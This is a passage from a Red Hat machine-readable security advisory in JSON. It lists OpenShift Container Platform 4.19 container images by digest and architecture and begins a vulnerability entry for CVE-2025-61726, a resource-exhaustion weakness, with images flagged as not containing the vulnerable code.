"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
